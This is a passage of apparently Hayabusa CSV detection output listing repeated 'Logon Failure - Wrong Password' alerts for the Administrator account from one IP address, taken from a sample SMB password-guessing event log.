NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:22.976 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vdFC4g7vsLO0zOzL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:23.019 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HpdCohLheoqQ6DXw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:23.062 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xHS3sclMwgHuH8rE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:23.100 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sNSheImuQwgOEH5g : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:23.142 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GX5y374mlYYXbAB2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:23.180 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eaFRL6q9KQY5bFHZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:23.230 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MrkEyJmfLiSrvQGs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:23.261 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Fd1vJiJa3pdjqdQV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:23.316 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RVrZl3LOIa7VLhT7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:23.357 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TKR8KbyQkwRX1qTE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:23.396 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GY22XuDxbE5lvEra : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:23.441 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4AntiX3j9HLHcOOq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:23.501 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XIvMbod41WeNADy5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:23.538 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0UL4lb3CCrv7YfGQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:23.580 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OyRktDjPqFyrdSTQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:23.632 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HKEGmAH8Wbc7f3jC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:23.676 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 06Dfi4lO2Vdw3gCr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:23.720 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 29eXmenUTACkAHKC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:23.760 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2Zq7Gl6hnKDJJqFc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:23.809 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jKENlWYt6m78taZR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:23.863 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 822SUU2Hg6w6AqQh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:23.911 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bROU0Mk9Z4yEq323 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:23.952 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EKfVPleDpLLqkuKq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:24.047 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NGWVqbchMitnLVYT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:24.086 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: y7K9vifU9lWwpP9J : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:24.142 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oIgKYj210JfICJXv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:24.180 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jisuKilPQivTV8yE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:24.229 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hckyoom0XnqpRzK8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:24.284 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: De0l6qgcuhMERjMY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:24.343 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SSa7pylPWn8jl2Ox : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:24.377 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ol9OntO4hqidlNUi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:24.431 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kXOBF0ZWLxMauHuT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:24.504 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WVBFJltkR5vnmpYD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:24.554 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kHVXEHq9zNYdfTpZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:24.600 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OIw3BxmLsfwDXXFg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:24.647 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hhgRhjnhkRJus4fw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:24.696 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xz78guWXrekEvuFT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:24.742 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 04wNT26RJmriQrfH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:24.792 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XmbuuymdSpfNldt2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:24.837 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yqJarBVOImq5Tn2p : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:24.876 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BZYExQroYH65tPuG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:24.913 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: llU5DQBrIrV3VtG5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:24.953 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HV17iXOYQqs2ntax : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:24.994 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: esZnEeyGdPa22PsL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:25.037 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rlYFTP9a2wdi5A2n : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:25.075 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oJifU0PnO1Ntp6z3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:25.120 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xGKdKjJy28Qd1whT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:25.166 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: x3L4BYjYJYlvuYHE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:25.206 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ui5RoLKttDo0wfFJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:25.248 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: G2xjdWobsxBjo6p7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:25.293 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TPeQ0M5lXITI84G3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:25.337 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uu72qx4lG5ZRM7xf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:25.392 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zD072YR1hIgbzjaT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:25.449 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EqA7HDvImIlCiFq2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:25.508 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: efYFxZwMGEC3vVi7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:25.552 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6WmMHYegvFJvv6zd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:25.601 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DS9WkRnP0B5MgaeX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:25.656 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: y5jNPV7ZgFExgg9n : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:25.707 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: V1FJ6vm3wK97iual : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:25.753 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GLuIx0sfF8NQD8QY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:25.800 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: y3lMvcrrmGTkjdlh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:25.854 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2ZqOabcNMeazs6TC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:25.908 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: j2AbE9D8PvuFDBz5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:25.966 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wzWdLEEc68ZvviGh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:26.030 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AtV3BuZiljbAeikO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:26.081 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tnKKfcwikNDdYOam : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:26.125 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jSbbzD7fpJY4Q1JL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:26.175 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gOASpLLE25ruCnGW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:26.232 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1jhUGOtszbPUwccL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:26.271 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yB8Mzo1RppdpLFKS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:26.312 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rOwoUlHGVeSbAhuN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:26.357 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BXIEHbkrjwedeaih : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:26.401 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OvsKoixgEzUgAyie : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:26.504 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TzaZe6Y4Tdfjseuk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:26.555 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FEmbuU3CAC3CecZy : IP Address: 192.168.198.149 : AuthPackage: 